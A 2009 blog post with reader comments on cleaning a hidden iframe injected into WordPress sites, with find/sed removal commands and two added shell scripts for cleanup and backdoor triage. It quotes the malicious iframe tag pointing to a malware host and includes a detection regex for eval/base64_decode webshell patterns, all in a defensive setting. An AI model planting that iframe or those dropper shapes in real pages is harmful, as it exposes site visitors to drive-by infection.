
How to Remove reycross.com WordPress Malware

Sep 15, 2009

Technology


It seems that a new WordPress malware hijack is making the rounds, and we got hit. Google just issued me a “this site contains malware” warning for my sites. After some quick investigation it looks like the hijack has appended a malicious <iframe> block to the end of every HTML and PHP page on the site, so now I need to clean it out.

Luckily this is just like last time and was easy to get rid of. I hope this tip helps someone else out as well.

This time, the iframe snippet that was getting added was:

<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Luckily, I still had my old script lying around that systematically searches through all my files and strips the offending piece of crap out of them. You can run this command to do the same:

find . -name '*.*' -exec sed -i 's/<iframe src="http:\/\/reycross.com\/laso\/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;

Hope this helps anybody else getting sacked by this attack. I think it has to do with a theme vulnerability :(
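As an added example (not the post's own one-liner), here is a small POSIX shell script that does the same cleanup in separate, checkable steps: list the files that still carry the reycross marker, copy each one to a backup directory outside the site root, strip the iframe tag with sed, and then re-count so you know the run actually removed everything (the "how do I know it worked" question that comes up in the comments). It assumes GNU sed and grep, and the sample site it builds in a temp directory is constructed so you can try it offline before touching a real host.

```shell
#!/bin/sh
# Added example, not the original post's command. Assumes GNU sed (-i) and
# grep -r. Usage: sh clean_reycross.sh /path/to/site/root /path/to/backup/dir
# The backup directory must live OUTSIDE the site root, or the copies would be
# counted as still-infected files.

# Literal marker to search for, and the regex the iframe tag is stripped with.
MARKER='reycross.com/laso/s.php'
IFRAME_RE='<iframe src="http://reycross\.com/laso/s\.php"[^>]*></iframe>'

# Print every file under $1 that still contains the marker, one path per line.
# grep exits 1 when nothing matches; treat that as "no infected files".
list_infected() {
  grep -rlF -- "$MARKER" "$1" || true
}

# Number of infected files under $1.
count_infected() {
  list_infected "$1" | wc -l | tr -d ' '
}

# For each infected file: copy it to $2 under the same relative path, then
# delete every occurrence of the iframe tag in place.
clean_site() {
  site=$1
  backup=$2
  list_infected "$site" | while IFS= read -r f; do
    rel=${f#"$site"/}
    mkdir -p "$backup/$(dirname "$rel")"
    cp -p "$f" "$backup/$rel"
    sed -i -e "s#$IFRAME_RE##g" "$f"
  done
}

# Succeeds only when no file under $1 references the malware host any more.
verify_clean() {
  [ "$(count_infected "$1")" = "0" ]
}

# Constructed sample site for offline trials: two infected files, one clean.
make_sample_site() {
  d=$(mktemp -d)
  mkdir -p "$d/wp-content/themes/sample"
  tag='<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'
  printf '<?php get_header(); ?>\n<p>hello</p>\n%s' "$tag" > "$d/index.php"
  printf '</body></html>%s\n%s\n' "$tag" "$tag" > "$d/wp-content/themes/sample/footer.php"
  printf '<?php /* constructed, no real settings */ define("WP_DEBUG", false);\n' > "$d/wp-config.php"
  echo "$d"
}

if [ $# -eq 2 ]; then
  echo "infected files before: $(count_infected "$1")"
  clean_site "$1" "$2"
  if verify_clean "$1"; then
    echo "clean: no file references $MARKER"
  else
    echo "still infected:"
    list_infected "$1"
  fi
fi
```

Two design points: matching on the host path with grep -F first means only files that actually contain the injection are rewritten, so the modification times of clean files stay intact (useful if you later want to list recently changed files), and the regex tolerates attribute variations of the same tag instead of requiring the byte-exact string. Flush any page cache (WP Super Cache and the like) after the run, since a cached copy of an infected page will keep serving the iframe even though the files on disk are clean.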


This post was written by:

Riyad Kalla - who has written 1727 posts on The “Break it Down” Blog.

"Ultimately I just want to provide a resource that folks find useful."

12 Comments For This Post

  1. Lance Snead Says:

    Thanks for the script. I got infected with the same thing.
    Where do I fire off the script in the shell? Can I just do it in the root of my website, or do I need to go into each folder?

    The line I’m trying to remove is:

    My script looks like this:
    find . -name '*.*' -exec sed -i 's///g' {} \;

    How do I know it successfully cleaned any files?
    It appears that the index.php file is infected everywhere, so I manually changed those. I’m afraid that I could possibly still have infected files.

    Thanks for your help.

    Lance

  2. Riyad Kalla Says:

    Lance,

    The bug is insidious, it likes to infect every PHP and HTML file it can find.

    You want to run this from the root dir of your website; it will crawl *every* file, and every time it finds the offending iframe entry it will remove it (effectively doing a find-replace with “”).

    You can see if it’s gone by being sure you dump any cache you have of the site, like WP Super Cache (just hit “Delete cache button”) and then view the website and click around the admin UI and some of the other main public pages and View Source on the page and search for “reycross.com” to make sure it’s gone.

  3. Lance Snead Says:

    Thanks for the post Riyad.
    I successfully removed it with your script.
    Greatly appreciated!

  4. Edgard Says:

    Hi, please, some help here. I have the same rey cross problem, but I don't know what to do with your code:
    find . -name '*.*' -exec sed -i 's///g' {} \;

    I need help in how to use the code.

    Best Regards
    Edgard

  5. cold Says:

    I’ve been hit twice now, WordPress needs to get their ass in gear before I drop their software.

  6. Edgard Says:

    Hi Cold,

    Do you know how to get rid of it?
    Do you know how to use the command or how to activate it?

    Regards
    Edgar

  7. Adam Says:

    I have this same problem. I am a web site designer/coder… But I don’t have WordPress. Does anyone know how they actually got onto my webserver (shared hosting on 1and1) and executed this to add the iframe to all my files? It is worrying from a security perspective and my clients are blaming me :-(

  8. Riyad Kalla Says:

    Adam,

    I *think* it’s related to the theme. I run a handful of sites and all the ones with *this* theme on them got infected, but the other ones that are linked to from this site that had different themes did not get infected.

    As for what exactly in the theme caused the issue, I’m afraid I don’t know.

  9. Riyad Kalla Says:

    Edgar,

    You run that command from the command line on your Unix-based system from the root directory of where your site lives. For example /var/www/html

  10. dana Says:

    i am trying to follow the instructions but i have no idea how to run a script (or get to a command prompt). should i use my ftp site?

  11. Riyad Kalla Says:

    dana,

    You’ll want to use SSH (Putty for Windows works great) to login to the Unix/Linux box that hosts your site, then go to the root directory of your website, usually something like /var/www/html directory, and then run this script — it will go through all files, finding and matching the exact reycross line and removing it. (technically it’s doing a find-replace of the reycross iframe with an empty string)

  12. Adam Says:

    OK… this is the issue. You have been hacked. This is nothing to do with WordPress or any other particular application. Your server has been compromised. Probably via a SQL attack which has given the user access to your FTP details. Have a look on Google/YouTube to see how easy it is to do. If it wasn’t via SQL attack, then you may have had your FTP info compromised by a bug in early versions of Adobe products. Or, your FTP details have been hacked because they were just too easy to guess.

    Answer is this: Download your entire website off your web server. Do a fresh install of WordPress and then mySQL your data back into the site. BUT only run the data you need… nothing else. no config… nothing.

    Do not just do the search and replace. The point is that, if someone has had access to your server, which they have, they will have left a backdoor file on there to gain access again – probably a c99.php – which allows them to basically run your server any time they wish. Obviously, they won’t have called it c99.php but something less obvious that looks like it should be there. Clean the WHOLE site off and start again!

    Change your FTP passwords immediately. Change your WordPress admin passwords… Make sure they are different or you can be SQL attacked. And make sure they are something long with numbers and letters all jumbled up.

    And you should be OK

    adam clark
    http://www.activehq.co.uk
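Adam's point above is that a search-and-replace removes the symptom, not the foothold that was used to plant it. As an added example (not Adam's code and not part of the post), the following POSIX shell script is the triage a defender would run before deciding whether a rebuild is needed: it lists PHP files changed in the last few days, PHP files sitting under upload or cache directories where none should execute, and PHP files whose source calls eval or assert on decoded or request-supplied data. It assumes GNU find and grep; the sample site it builds in a temp directory is constructed, and the "suspicious" fixture in it is an inert string that only carries the marker text.

```shell
#!/bin/sh
# Added example, not from the post or its commenters. Assumes GNU find and
# grep (--include). Usage: sh triage_backdoors.sh /path/to/site/root [days]
# These are heuristics for a human to review: every hit needs a look, and an
# empty report does not prove the host is clean.

# eval/assert fed a decoded blob or request-supplied input is the classic
# dropper shape. ERE, single-quoted so \( and \$ reach grep intact.
SUSPICIOUS_RE='(eval|assert) *\( *(base64_decode|gzinflate|str_rot13|gzuncompress|\$_(GET|POST|REQUEST|COOKIE))'

# PHP files under $1 modified within the last $2 days (default 7). The injected
# iframe and whatever planted it usually share a time window.
recent_php() {
  find "$1" -type f -name '*.php' -mtime "-${2:-7}"
}

# PHP files where nothing should ever execute: upload and cache directories.
php_in_uploads() {
  find "$1" -type f -name '*.php' \
    \( -path '*/wp-content/uploads/*' -o -path '*/wp-content/cache/*' \)
}

# PHP files whose source matches SUSPICIOUS_RE (grep exits 1 on no match).
suspicious_php() {
  grep -rlE --include='*.php' -- "$SUSPICIOUS_RE" "$1" || true
}

# Constructed sample site: one recent clean file, one old clean file, and one
# inert fixture under uploads/ that only contains the marker text.
make_sample_site() {
  d=$(mktemp -d)
  mkdir -p "$d/wp-includes" "$d/wp-content/uploads/2009/09"
  printf '<?php get_header(); ?>\n' > "$d/index.php"
  printf '<?php function old_helper() { return 1; }\n' > "$d/wp-includes/old.php"
  touch -t 200901010000 "$d/wp-includes/old.php"
  printf '<?php /* constructed fixture, deliberately inert */ $m = "eval(base64_decode(";\n' \
    > "$d/wp-content/uploads/2009/09/photo.php"
  echo "$d"
}

if [ $# -ge 1 ]; then
  echo "== PHP files modified in the last ${2:-7} days"
  recent_php "$1" "${2:-7}"
  echo "== PHP files under upload/cache directories"
  php_in_uploads "$1"
  echo "== PHP files calling eval/assert on decoded or request-supplied data"
  suspicious_php "$1"
fi
```

Treat every hit as a lead rather than a verdict: diff flagged core files against a pristine copy of the same WordPress release, and expect a planted file to mimic a legitimate name, as Adam notes. If anything in the report turns out to be a real shell, the rebuild-from-clean path he describes (fresh install, only your own content restored, every credential rotated) is the safe one; deleting the single file you happened to find is not.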
